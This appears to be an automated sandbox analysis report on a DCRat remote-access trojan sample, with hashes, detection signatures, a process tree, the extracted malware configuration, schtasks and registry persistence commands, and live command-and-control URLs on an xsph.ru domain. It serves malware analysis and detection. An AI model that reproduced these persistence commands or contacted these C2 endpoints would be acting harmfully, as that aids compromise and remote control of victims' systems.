Edit tour

Windows Analysis Report
4KjLUaW30K.exe

Overview

General Information

Sample name:	4KjLUaW30K.exe renamed because original name is a hash value
Original sample name:	181d043c0617914801548f09d5b776d4.exe
Analysis ID:	1561676
MD5:	181d043c0617914801548f09d5b776d4
SHA1:	757f042065a3dc2c9f73e635b41f83591c8ad647
SHA256:	501aa5f94b15b8716ef7f76e2dbdc146b436cd9e72274d6ec5dec7265706c0ad
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

4KjLUaW30K.exe (PID: 4564 cmdline: "C:\Users\user\Desktop\4KjLUaW30K.exe" MD5: 181D043C0617914801548F09D5B776D4)

schtasks.exe (PID: 1488 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5408 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3720 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2276 cmdline: schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1776 cmdline: schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6204 cmdline: schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2276 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 892 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5560 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6552 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6728 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1488 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2276 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 892 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5560 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6552 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6728 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6204 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2276 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 12 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7184 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7236 cmdline: schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

mnUYCZffXdEgQlZPiczLektp.exe (PID: 7304 cmdline: "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" MD5: 181D043C0617914801548F09D5B776D4)

wscript.exe (PID: 7844 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

mnUYCZffXdEgQlZPiczLektp.exe (PID: 8092 cmdline: "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" MD5: 181D043C0617914801548F09D5B776D4)

wscript.exe (PID: 7948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

dllhost.exe (PID: 6484 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

audiodg.exe (PID: 1488 cmdline: "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe" MD5: 181D043C0617914801548F09D5B776D4)

audiodg.exe (PID: 6768 cmdline: "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe" MD5: 181D043C0617914801548F09D5B776D4)

dllhost.exe (PID: 7216 cmdline: "C:\Program Files (x86)\windows defender\dllhost.exe" MD5: 181D043C0617914801548F09D5B776D4)

dllhost.exe (PID: 7264 cmdline: "C:\Program Files (x86)\windows defender\dllhost.exe" MD5: 181D043C0617914801548F09D5B776D4)

mnUYCZffXdEgQlZPiczLektp.exe (PID: 7316 cmdline: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe MD5: 181D043C0617914801548F09D5B776D4)

mnUYCZffXdEgQlZPiczLektp.exe (PID: 7388 cmdline: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe MD5: 181D043C0617914801548F09D5B776D4)

ShellExperienceHost.exe (PID: 7484 cmdline: C:\Users\Public\Downloads\ShellExperienceHost.exe MD5: 181D043C0617914801548F09D5B776D4)

ShellExperienceHost.exe (PID: 7560 cmdline: C:\Users\Public\Downloads\ShellExperienceHost.exe MD5: 181D043C0617914801548F09D5B776D4)

System.exe (PID: 7616 cmdline: C:\Recovery\System.exe MD5: 181D043C0617914801548F09D5B776D4)

System.exe (PID: 7640 cmdline: C:\Recovery\System.exe MD5: 181D043C0617914801548F09D5B776D4)

System.exe (PID: 8152 cmdline: "C:\Recovery\System.exe" MD5: 181D043C0617914801548F09D5B776D4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"d\":\".\",\"1\":\"%\",\"I\":\"@\",\"U\":\" \",\"5\":\"(\",\"J\":\"*\",\"M\":\"&\",\"A\":\"-\",\"T\":\")\",\"C\":\",\",\"B\":\"_\",\"L\":\"^\",\"R\":\"~\",\"y\":\">\",\"i\":\"!\",\"0\":\"`\",\"V\":\"<\",\"G\":\"$\",\"E\":\"|\",\"9\":\"#\",\"3\":\";\"}", "PCRT": "{\"F\":\"&\",\"W\":\">\",\"X\":\"^\",\"2\":\"`\",\"0\":\",\",\"S\":\";\",\"u\":\"-\",\"G\":\"_\",\"J\":\"*\",\"C\":\"#\",\"Q\":\"@\",\"U\":\"<\",\"c\":\" \",\"b\":\"(\",\"d\":\"!\",\"z\":\"%\",\"T\":\"|\",\"V\":\")\",\"k\":\".\",\"R\":\"$\",\"a\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-lWaBBBPi9nde67B22ADT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 4KjLUaW30K.exe PID: 4564	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: audiodg.exe PID: 1488	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: audiodg.exe PID: 6768	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dllhost.exe PID: 7216	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dllhost.exe PID: 7264	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7304	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7316	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7388	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ShellExperienceHost.exe PID: 7484	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ShellExperienceHost.exe PID: 7560	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: System.exe PID: 7616	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: System.exe PID: 7640	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 8092	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: System.exe PID: 8152	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 29 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe, CommandLine: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe, NewProcessName: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe, OriginalFileName: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe, ProcessId: 7316, ProcessName: mnUYCZffXdEgQlZPiczLektp.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\4KjLUaW30K.exe, ProcessId: 4564, TargetFilename: C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Downloads\ShellExperienceHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4KjLUaW30K.exe, ProcessId: 4564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" , ParentImage: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe, ParentProcessId: 7304, ParentProcessName: mnUYCZffXdEgQlZPiczLektp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , ProcessId: 7844, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" , ParentImage: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe, ParentProcessId: 7304, ParentProcessName: mnUYCZffXdEgQlZPiczLektp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , ProcessId: 7844, ProcessName: wscript.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe", CommandLine: "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe, NewProcessName: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe, OriginalFileName: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe", ProcessId: 1488, ProcessName: audiodg.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" , ParentImage: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe, ParentProcessId: 7304, ParentProcessName: mnUYCZffXdEgQlZPiczLektp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , ProcessId: 7844, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4KjLUaW30K.exe, ProcessId: 4564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4KjLUaW30K.exe, ProcessId: 4564, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f, CommandLine: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4KjLUaW30K.exe", ParentImage: C:\Users\user\Desktop\4KjLUaW30K.exe, ParentProcessId: 4564, ParentProcessName: 4KjLUaW30K.exe, ProcessCommandLine: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f, ProcessId: 6552, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" , ParentImage: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe, ParentProcessId: 7304, ParentProcessName: mnUYCZffXdEgQlZPiczLektp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs" , ProcessId: 7844, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /f, CommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4KjLUaW30K.exe", ParentImage: C:\Users\user\Desktop\4KjLUaW30K.exe, ParentProcessId: 4564, ParentProcessName: 4KjLUaW30K.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /f, ProcessId: 2276, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T04:02:05.225882+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49708	141.8.192.93	80	TCP
2024-11-24T04:02:26.104737+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49732	141.8.192.93	80	TCP
2024-11-24T04:02:37.974159+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49759	141.8.192.93	80	TCP
2024-11-24T04:02:49.280812+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49786	141.8.192.93	80	TCP
2024-11-24T04:03:10.389897+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49836	141.8.192.93	80	TCP
2024-11-24T04:03:29.339694+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49878	141.8.192.93	80	TCP
2024-11-24T04:03:38.053776+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49897	141.8.192.93	80	TCP
2024-11-24T04:03:44.881860+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49913	141.8.192.93	80	TCP
2024-11-24T04:04:03.285144+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49955	141.8.192.93	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4KjLUaW30K.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://a1043195.xsph.ru/e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI	Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR	Avira URL Cloud: Label: malware
